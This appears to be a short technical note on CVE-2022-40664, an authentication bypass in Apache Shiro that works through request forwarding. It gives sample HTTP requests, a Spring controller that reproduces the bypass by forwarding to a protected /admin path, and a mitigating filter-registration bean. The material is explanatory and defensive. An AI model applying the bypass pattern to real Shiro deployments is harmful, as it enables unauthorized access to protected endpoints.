Apache Shiro before 1.10.0, Authentication Bypass Vulnerability in Shiro when forwarding or including via RequestDispatcher.1
GET /admin/auth_pass HTTP/1.1
GET /admin/auth HTTP/1.1
GET /admin/auth HTTP/1.1
Token: 4ra1n
@RequestMapping("/admin/{value}")
public String CVE_2022_40664_bypass(@PathVariable String value, HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    // Log which /admin/* URI was hit before dispatching. `request` is already typed as
    // HttpServletRequest, so the original's cast is dropped.
    String requestUri = request.getRequestURI();
    System.out.println("=========== /admin" + requestUri + "/ ===========");

    // Client-side redirect: the browser issues a brand-new request for /admin/auth,
    // which enters the servlet filter chain as an ordinary REQUEST dispatch.
    response.sendRedirect("/admin/auth");

    // Server-side alternative kept from the original for reference (not executed here):
    //   request.getRequestDispatcher("/admin/auth").forward(request, response);
    //   return "forward:" + request.getRequestURI();
    // A FORWARD dispatch stays inside the container, so the Shiro filter only sees it
    // when the filter registration includes DispatcherType.FORWARD.

    // NOTE(review): Spring's view-name prefix is the lower-case "redirect:", and this
    // value is returned after sendRedirect has already committed the response -- confirm
    // this is intended rather than a leftover.
    return ("Redirect:/admin/auth");
}
forward4
// Server-side forward to /admin/auth: no new client request is made, so this dispatch
// reaches a servlet filter only if that filter is registered for DispatcherType.FORWARD
// (filter registrations cover REQUEST only unless configured otherwise).
request
    .getRequestDispatcher("/admin/auth")
    .forward(request, response);
Define Bean5
@Bean
public MyShiroFilterFactoryBean filterRegBean(SecurityManager securityManager) throws Exception{
    // Mitigation for CVE-2022-40664 (authentication bypass when a request is forwarded
    // or included via RequestDispatcher). Two settings matter: the Shiro filter must be
    // allowed to run more than once per request, and its registration must cover every
    // dispatcher type rather than REQUEST only.
    ShiroFilterConfiguration filterConfig = new ShiroFilterConfiguration();
    // false: the filter is not skipped when the same request passes the chain a second
    // time (e.g. after a forward or include).
    filterConfig.setFilterOncePerRequest(false);

    ShiroFilterFactoryBean factory = new ShiroFilterFactoryBean();
    factory.setSecurityManager(securityManager);
    factory.setShiroFilterConfiguration(filterConfig);
    // FactoryBean.getObject() is declared to throw Exception, hence this method's throws clause.
    AbstractShiroFilter shiroFilter = factory.getObject();

    MyShiroFilterFactoryBean registration = new MyShiroFilterFactoryBean();
    registration.setFilter(shiroFilter);
    registration.addUrlPattern("/*");
    registration.setName("shiroFilter");
    registration.setSecurityManager(securityManager);
    // REQUEST, FORWARD, INCLUDE, ERROR and ASYNC: a filter registered for REQUEST alone
    // is not invoked for a controller-initiated forward or include, which is the gap
    // this bean closes.
    registration.setDispatcherTypes(EnumSet.allOf(DispatcherType.class));
    return registration;
}
Does not work.